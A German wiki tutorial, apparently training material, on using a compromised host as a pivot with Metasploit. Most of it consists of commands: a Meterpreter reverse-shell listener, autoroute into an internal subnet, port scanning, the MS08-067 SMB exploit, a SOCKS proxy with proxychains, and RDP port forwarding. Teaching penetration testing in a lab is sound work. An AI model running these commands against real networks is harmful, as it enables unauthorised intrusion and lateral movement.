Metasploit als Pivot Host: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „== Ziel == * Zugriff auf interne Systeme im Netz 10.0.10.0/24, die vom Angreifer aus nicht direkt erreichbar sind * Nutzung eines kompromittierten Hosts als Sp…“)
 
 
Zeile 98: Zeile 98:
  
 
== Hinweise ==
 
== Hinweise ==
* `autoroute` funktioniert nur mit Meterpreter-Sessions
+
*autoroute funktioniert nur mit Meterpreter-Sessions
* Für effektives Pivoting sollte der Zielhost nicht durch Firewall blockiert sein
+
*Für effektives Pivoting sollte der Zielhost nicht durch Firewall blockiert sein
* Der `socks_proxy`-Modus ist nützlich für Tools wie `smbclient`, `nmap`, `proxychains`, `firefox`, etc.
+
*Der socks_proxy-Modus ist nützlich für Tools wie smbclient, nmap, proxychains, firefox, etc.
* Mehrere Pivot-Sessions sind möglich, aber unübersichtlich – beschränke dich im Training auf eine
+
*Mehrere Pivot-Sessions sind möglich, aber unübersichtlich – beschränke dich im Training auf eine
  
 
== Siehe auch ==
 
== Siehe auch ==

Aktuelle Version vom 22. Mai 2025, 09:36 Uhr

Ziel

  • Zugriff auf interne Systeme im Netz 10.0.10.0/24, die vom Angreifer aus nicht direkt erreichbar sind
  • Nutzung eines kompromittierten Hosts als Sprungbrett („Jump Host“)
  • Portweiterleitung, Routing und Exploits über Metasploit

Voraussetzungen

  • Erfolgreicher Exploit mit Meterpreter-Session auf einem System innerhalb von 10.0.10.0/24
  • Metasploit ist aktiv mit laufender Session

Meterpreter-Session starten

  • Exploit nutzen oder manuell Listener starten:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set LPORT 4444
run
  • Wenn sich das Ziel meldet:
sessions

Beispielausgabe:

[*] Meterpreter session 1 opened

Interne Netzwerke sichtbar machen

  • In der Session:
sessions -i 1
ipconfig
route
arp
  • Notiere interne Subnetze, z. B. 10.0.10.0/24

Autoroute einrichten für 10.0.10.0/24

  • In der aktiven Meterpreter-Session:
run autoroute -s 10.0.10.0 -n 255.255.255.0
  • Anzeige aller Routen:
run autoroute -p

Scannen von Zielen über die Session

  • Zurück in msfconsole:
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.10.10
set PORTS 22,80,445
run
  • Der Scan wird über die autoroute durch die Meterpreter-Session geleitet.

Exploits durch die Pivot-Route durchführen

  • Beispiel:
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.0.10.10
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set LPORT 4445
exploit

Optional: SOCKS-Proxy starten für externe Tools

  • SOCKS-Proxy aktivieren:
use auxiliary/server/socks_proxy
run
  • In /etc/proxychains.conf folgendes ergänzen:
socks5 127.0.0.1 1080
  • Beispiel mit nmap durch die Pivot-Verbindung:
proxychains nmap -sT -Pn 10.0.10.20

Portweiterleitung (portfwd) nutzen

  • In Meterpreter:
portfwd add -l 4444 -p 3389 -r 10.0.10.10
  • Danach kannst du dich lokal auf RDP 127.0.0.1:4444 verbinden → wird an 10.0.10.10:3389 weitergeleitet

Hinweise

  • autoroute funktioniert nur mit Meterpreter-Sessions
  • Für effektives Pivoting sollte der Zielhost nicht durch Firewall blockiert sein
  • Der socks_proxy-Modus ist nützlich für Tools wie smbclient, nmap, proxychains, firefox, etc.
  • Mehrere Pivot-Sessions sind möglich, aber unübersichtlich – beschränke dich im Training auf eine

Siehe auch